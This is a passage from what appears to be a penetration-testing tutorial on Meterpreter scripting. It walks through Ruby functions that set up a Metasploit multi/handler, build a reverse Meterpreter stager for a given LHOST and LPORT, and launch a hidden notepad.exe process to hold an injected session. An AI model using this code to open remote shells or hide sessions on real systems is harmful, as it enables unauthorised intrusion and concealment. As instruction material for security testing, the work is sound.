Meterpreter Scripting
We then write the memory to our process using host_process.memory.write and create a new thread using host_process.thread.create.
Next we define the multi-handler that handles the connections based on the selected payload, as shown in boldface in the following output. (The default is Meterpreter, so the multi-handler will handle Meterpreter sessions unless otherwise specified.)
# Function for creation of connection handler
#-------------------------------------------------------------------------------
def create_multi_handler(payload_to_inject)
  # Instantiate the generic multi/handler exploit module from the framework
  mul = @client.framework.exploits.create("multi/handler")
  # Inherit LHOST/LPORT and the other options already set on the payload
  mul.share_datastore(payload_to_inject.datastore)
  mul.datastore['WORKSPACE']     = @client.workspace
  mul.datastore['PAYLOAD']       = payload_to_inject
  mul.datastore['EXITFUNC']      = 'process'
  mul.datastore['ExitOnSession'] = true
  print_status("Running payload handler")
  # Run the handler as a background job so the script keeps executing
  mul.exploit_simple(
    'Payload'  => mul.datastore['PAYLOAD'],
    'RunAsJob' => true
  )
end
The pay = client.framework.payloads.create(payload) call in the following section allows us to create a payload from the Metasploit Framework. Because we know this is a Meterpreter payload, Metasploit will automatically generate it for us.
# Function for Creating the Payload
#-------------------------------------------------------------------------------
def create_payload(payload_type, lhost, lport)
  print_status("Creating a reverse meterpreter stager: LHOST=#{lhost} LPORT=#{lport}")
  payload = payload_type
  # Instantiate the payload module by its reference name (e.g. windows/meterpreter/reverse_tcp)
  pay = client.framework.payloads.create(payload)
  # Point the stager back at the listener address and port
  pay.datastore['LHOST'] = lhost
  pay.datastore['LPORT'] = lport
  return pay
end
The next option spawns a process using Notepad by default. If we didn't specify a process, it would have created a Notepad process for us automatically.
# Function that starts the notepad.exe process
#-------------------------------------------------------------------------------
def start_proc()
  print_good("Starting Notepad.exe to house Meterpreter Session.")
  # Launch notepad.exe with no arguments and no visible window
  proc = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true })
  print_good("Process created with pid #{proc.pid}")
  return proc.pid
end